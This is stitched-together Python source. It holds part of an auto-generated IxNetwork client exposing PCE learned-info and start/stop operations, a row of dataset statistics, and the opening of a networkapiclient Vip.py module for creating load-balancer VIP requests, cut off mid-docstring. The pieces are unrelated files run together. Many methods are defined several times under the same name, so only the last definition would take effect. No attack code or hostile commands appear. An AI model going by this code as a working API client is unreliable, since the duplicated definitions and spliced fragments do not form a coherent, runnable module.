Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllRsvpLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedAllRsvpLspLearnedInfo operation on the server.
Gets Detailed Information about All RSVP LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllSrLspLearnedInfo(self):
"""Executes the getPceDetailedAllSrLspLearnedInfo operation on the server.
Gets Detailed Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllSrLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedAllSrLspLearnedInfo operation on the server.
Gets Detailed Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllSrLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedAllSrLspLearnedInfo operation on the server.
Gets Detailed Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllSrLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedAllSrLspLearnedInfo operation on the server.
Gets Detailed Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccRequestedLspLearnedInfo(self):
"""Executes the getPceDetailedRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccRequestedLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccSyncLspLearnedInfo(self):
"""Executes the getPceDetailedRsvpPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccSyncLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedRsvpPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPceInitiatedLspLearnedInfo(self):
"""Executes the getPceDetailedRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPceInitiatedLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccRequestedLspLearnedInfo(self):
"""Executes the getPceDetailedSrPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccRequestedLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedSrPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccSyncLspLearnedInfo(self):
"""Executes the getPceDetailedSrPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccSyncLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedSrPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPceInitiatedLspLearnedInfo(self):
"""Executes the getPceDetailedSrPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPceInitiatedLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedSrPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def RestartDown(self):
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('RestartDown', payload=locals(), response_object=None)
def RestartDown(self, SessionIndices):
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('RestartDown', payload=locals(), response_object=None)
def RestartDown(self, SessionIndices):
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('RestartDown', payload=locals(), response_object=None)
def Start(self):
"""Executes the start operation on the server.
Start selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Start', payload=locals(), response_object=None)
def Start(self, SessionIndices):
"""Executes the start operation on the server.
Start selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Start', payload=locals(), response_object=None)
def Start(self, SessionIndices):
"""Executes the start operation on the server.
Start selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Start', payload=locals(), response_object=None)
def Stop(self):
"""Executes the stop operation on the server.
Stop selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Stop', payload=locals(), response_object=None)
def Stop(self, SessionIndices):
"""Executes the stop operation on the server.
Stop selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Stop', payload=locals(), response_object=None)
def Stop(self, SessionIndices):
"""Executes the stop operation on the server.
Stop selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Stop', payload=locals(), response_object=None)
| 43.445704 | 308 | 0.763551 | 9,050 | 72,815 | 6.115249 | 0.04674 | 0.041469 | 0.032199 | 0.035741 | 0.912816 | 0.904432 | 0.899228 | 0.895795 | 0.879154 | 0.871113 | 0 | 0.010816 | 0.16958 | 72,815 | 1,675 | 309 | 43.471642 | 0.904444 | 0.734835 | 0 | 0.628169 | 0 | 0 | 0.164935 | 0.143929 | 0 | 0 | 0 | 0 | 0 | 1 | 0.329577 | false | 0 | 0.019718 | 0 | 0.661972 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
3840e053e5154ce81b54171e1a5e255dc637201e | 99 | py | Python | fc_messenger/__init__.py | fangqk1991/py-server | ddb86e7a434697d3f7048b8294603d46a2b8a18b | [
"MIT"
] | null | null | null | fc_messenger/__init__.py | fangqk1991/py-server | ddb86e7a434697d3f7048b8294603d46a2b8a18b | [
"MIT"
] | null | null | null | fc_messenger/__init__.py | fangqk1991/py-server | ddb86e7a434697d3f7048b8294603d46a2b8a18b | [
"MIT"
] | null | null | null | from .FCMessenger import FCMessenger
from .FCServer import FCServer
from .FCServer import FCRouter
| 24.75 | 36 | 0.848485 | 12 | 99 | 7 | 0.416667 | 0.285714 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 99 | 3 | 37 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
698be171c904b0cbb50654340889218119b10d19 | 63,987 | py | Python | networkapiclient/Vip.py | Milstein/GloboNetworkAPI-client-python | 2d313d4a07deaf766f8ec9c348e9c010d97599e3 | [
"Apache-2.0"
] | null | null | null | networkapiclient/Vip.py | Milstein/GloboNetworkAPI-client-python | 2d313d4a07deaf766f8ec9c348e9c010d97599e3 | [
"Apache-2.0"
] | null | null | null | networkapiclient/Vip.py | Milstein/GloboNetworkAPI-client-python | 2d313d4a07deaf766f8ec9c348e9c010d97599e3 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from networkapiclient.GenericClient import GenericClient
from networkapiclient.exception import InvalidParameterError
from networkapiclient.utils import is_valid_int_param, get_list_map
from networkapiclient.Config import IP_VERSION
from networkapiclient.Pagination import Pagination
class Vip(GenericClient):
def __init__(self, networkapi_url, user, password, user_ldap=None):
"""Class constructor receives parameters to connect to the networkAPI.
:param networkapi_url: URL to access the network API.
:param user: User for authentication.
:param password: Password for authentication.
"""
super(Vip, self).__init__(networkapi_url, user, password, user_ldap)
def criar_requisicao(
self,
id_ip,
id_healthcheck_expect,
finalidade,
cliente,
ambiente,
cache,
metodo_bal,
persistencia,
healthcheck_type,
healthcheck,
timeout,
host,
maxcon,
dsr,
bal_ativo,
transbordos,
reals,
portas):
"""Insere um nova requisição de VIP e retorna o seu identificador.
:param id_ip: Identificador do IP.
:param id_healthcheck_expect: Identificador do healthcheck expect.
:param finalidade: Finalidade.
:param cliente: Cliente.
:param ambiente: Ambiente.
:param cache: Cache.
:param metodo_bal: Método de balanceamento.
:param persistencia: Persistência.
:param healthcheck_type: Tipo de healthcheck.
:param healthcheck: Healthcheck.
:param timeout: Timeout.
:param host: Host.
:param maxcon: Número máximo de conexões.
:param dsr: DSR.
:param bal_ativo: Balanceador ativo.
:param transbordos: Lista com os ips dos servidores de transbordo. Ex: ['10.10.100.1','192.168.1.1'].
:param reals: Lista de reals. Ex: [{'real_name':'Teste1', 'real_ip':'10.10.10.1'},{'real_name':'Teste2', 'real_ip':'10.10.10.2'}]
:param portas: Lista das portas. Ex: ['80','8080','445'].
:return: Dicionário com a seguinte estrutura:
::
{'requisicao_vip': {'id': < id_da_requisicao_vip >}}
:raise InvalidParameterError: Identificador do IP é nulo ou inválido.
:raise InvalidParameterError: O valor de finalidade, cliente, ambiente, cache, metodo_bal, persistencia,
healthcheck_type, healthcheck, timeout, host, maxcon, dsr, bal_ativo, transbordos, reals ou portas é inválido.
:raise IpNaoExisteError: IP não cadastrado.
:raise HealthCheckExpectNaoExisteError: Healthcheck_expect não cadastrado.
:raise DataBaseError: Falha na networkapi ao acessar o banco de dados.
:raise XMLError: Falha na networkapi ao ler o XML de requisição ou gerar o XML de resposta.
"""
vip_map = dict()
vip_map['id_ip'] = id_ip
vip_map['id_healthcheck_expect'] = id_healthcheck_expect
vip_map['finalidade'] = finalidade
vip_map['cliente'] = cliente
vip_map['ambiente'] = ambiente
vip_map['cache'] = cache
vip_map['maxcon'] = maxcon
vip_map['metodo_bal'] = metodo_bal
vip_map['persistencia'] = persistencia
vip_map['healthcheck_type'] = healthcheck_type
vip_map['healthcheck'] = healthcheck
vip_map['timeout'] = timeout
vip_map['host'] = host
vip_map['dsr'] = dsr
vip_map['bal_ativo'] = bal_ativo
vip_map['transbordos'] = {'transbordo': transbordos}
vip_map['reals'] = {'real': reals}
vip_map['portas_servicos'] = {'porta': portas}
code, xml = self.submit({'vip': vip_map}, 'POST', 'vip/')
return self.response(code, xml)
def add(
self,
id_ipv4,
id_ipv6,
id_healthcheck_expect,
finality,
client,
environment,
cache,
method_bal,
persistence,
healthcheck_type,
healthcheck,
timeout,
host,
maxcon,
areanegocio,
nome_servico,
l7_filter,
reals,
reals_prioritys,
reals_weights,
ports,
rule_id=''):
"""Inserts a new request VIP and returns its identifier.
:param id_ipv4: Identifier of the IPv4. Integer value and greater than zero.
:param id_ipv6: Identifier of the IPv6. Integer value and greater than zero.
:param id_healthcheck_expect: Identifier of the expected result. (Only if healthcheck_type is HTTP)
:param finality: finality.
:param client: client.
:param environment: environment.
:param cache: cache.
:param method_bal: method_bal.
:param persistence: persistence.
:param healthcheck_type: healthcheck_type.
:param healthcheck: The URL to be checked. (Only if healthcheck_type is HTTP)
:param timeout: Timeout. Integer value and greater than zero.
:param host: Host.
:param maxcon: Maximum number of connections. Integer value and greater than zero.
:param areanegocio: area of business.
:param nome_servico: host.
:param l7_filter: l7_filter.
:param reals: List of reals. Ex: [{'real_name':'Teste1', 'real_ip':'10.10.10.1'},{'real_name':'Teste2', 'real_ip':'10.10.10.2'}]
:param reals_prioritys: List of reals_priority. Ex: ['1','5','3'].
:param reals_weights: List of reals_weight. Ex: ['1','5','3'].
:param ports: List of ports. Ex: ['80:80','8080:80','25:445'].
:param rule_id: rule id.
:return: Dictionary with the following structure:
::
{'requisicao_vip': {'id': < id_da_requisicao_vip >}}
:raise InvalidParameterError: IP identifier is null and invalid.
:raise InvalidParameterError: The value of finality, client, environment, cache, method_bal, persistence,
